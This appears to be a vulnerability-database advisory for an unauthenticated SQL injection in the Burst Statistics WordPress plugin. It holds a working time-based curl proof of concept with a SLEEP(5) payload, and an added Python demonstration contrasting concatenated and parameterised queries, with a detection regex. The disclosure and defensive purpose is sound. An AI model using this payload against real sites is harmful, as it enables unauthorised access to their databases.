WPEX-ID: 0C0AB92C-8FDD-4A58-814F-E974714A20C8 (wpvulndb / wpexploit)
Published: Dec 11, 2023 - 12:00 a.m.

Burst Statistics (Free < 1.5.0, Pro < 1.5.1) - Unauthenticated SQL Injection

2023-12-11 00:00:00
Source: wpvulndb
95
Tags: burst statistics, sql injection, unauthenticated

AI Score: 8 (High), Confidence: High
EPSS: 0.001 (Low), Percentile: 34.0%

Description: The Free (< 1.5.0) and Pro (< 1.5.1) plugins do not properly sanitise and escape the url parameter of the statistics beacon before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users: the proof of concept below sends no cookie, nonce or other credential.

Proof of concept (time-based: the response is delayed by about 5 seconds when the injected SLEEP(5) executes; the beacon body is a JSON object wrapped in a second JSON string, which is why the quotes are double-escaped):

curl 'https://example.com/burst-statistics-endpoint.php' \
  -H 'content-type: text/plain;charset=UTF-8' \
  --data-raw $'"{\\"fingerprint\\":false,\\"uid\\":\\"437a969907141c6c2042731efd2da038\\",\\"url\\":\\"https://example.com/abc\'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\'\\",\\"time_on_page\\":6907,\\"completed_goals\\":[]}"' \
  --compressed
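The following is an added example and is not part of the advisory or of the Burst Statistics code base. It reconstructs the body the curl command actually transmits once the shell unescapes it, decodes it the way a double-encoded beacon must be decoded, and then runs the extracted url through a hypothetical concatenated query (the bug class the advisory describes) and through a parameterised one. The `statistics` table, the `page_url` column and the query shape are assumptions made for illustration; SQLite stands in for MySQL, with a user-defined SLEEP() that records calls instead of pausing, so the time-based oracle can be observed offline.

```python
import json
import re
import sqlite3

# Body as it leaves the shell after $'...' unescaping (derived from the advisory's
# curl command): a JSON string whose content is itself a JSON object.
ADVISORY_BODY = r'''"{\"fingerprint\":false,\"uid\":\"437a969907141c6c2042731efd2da038\",\"url\":\"https://example.com/abc'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1='\",\"time_on_page\":6907,\"completed_goals\":[]}"'''

PAYLOAD_URL = "https://example.com/abc'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1='"
BENIGN_URL = "https://example.com/abc"


def encode_beacon(url, uid="437a969907141c6c2042731efd2da038"):
    """Build a beacon body in the double-encoded shape the PoC uses (constructed sample)."""
    inner = {"fingerprint": False, "uid": uid, "url": url,
             "time_on_page": 6907, "completed_goals": []}
    return json.dumps(json.dumps(inner, separators=(",", ":")))


def decode_beacon(raw):
    """Decode a beacon body; unwrap the outer JSON string if the object was double-encoded."""
    data = json.loads(raw)
    if isinstance(data, str):
        data = json.loads(data)
    if not isinstance(data, dict):
        raise ValueError("beacon body is not a JSON object")
    return data


# Heuristic (assumption, not a complete filter): a quote followed by a boolean operator,
# optionally separated by inline comments, is the shape of the advisory's payload.
_INJECT_RE = re.compile(r"'(?:\s|/\*.*?\*/)*(?:OR|AND|UNION)\b", re.IGNORECASE)


def looks_injected(url):
    """Return True when the url parameter matches the quote-break-and-OR pattern."""
    return _INJECT_RE.search(url) is not None


def make_db(sleep_calls):
    """In-memory stand-in for the plugin's table; SLEEP() records its argument instead of waiting."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda n: sleep_calls.append(n) or 0)
    conn.execute("CREATE TABLE statistics (id INTEGER PRIMARY KEY, page_url TEXT)")
    conn.executemany("INSERT INTO statistics (page_url) VALUES (?)",
                     [("https://example.com/",), ("https://example.com/contact",)])
    return conn


def lookup_vulnerable(conn, url):
    """Hypothetical vulnerable pattern: the value is spliced into the statement text."""
    return conn.execute(f"SELECT id FROM statistics WHERE page_url = '{url}'").fetchall()


def lookup_safe(conn, url):
    """Hardened form: the value travels as a bound parameter and can never alter the query."""
    return conn.execute("SELECT id FROM statistics WHERE page_url = ?", (url,)).fetchall()


def demo():
    """Return (SLEEP calls via concatenation, SLEEP calls via binding) for the PoC url."""
    url = decode_beacon(ADVISORY_BODY)["url"]
    calls = []
    conn = make_db(calls)
    lookup_vulnerable(conn, url)
    vulnerable_sleeps = len(calls)
    calls.clear()
    lookup_safe(conn, url)
    return vulnerable_sleeps, len(calls)


if __name__ == "__main__":
    print("decoded url:", decode_beacon(ADVISORY_BODY)["url"])
    print("flagged by heuristic:", looks_injected(PAYLOAD_URL), looks_injected(BENIGN_URL))
    print("SLEEP calls (concatenated, bound):", demo())
```

Against a live target the equivalent of `demo()` is the response time: a consistent five-second delay with SLEEP(5) that disappears with SLEEP(0) confirms the injection, and the patched releases (1.5.0 Free, 1.5.1 Pro) should show no delay. In WordPress the bound-parameter form corresponds to `$wpdb->prepare()` with `%s` placeholders.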
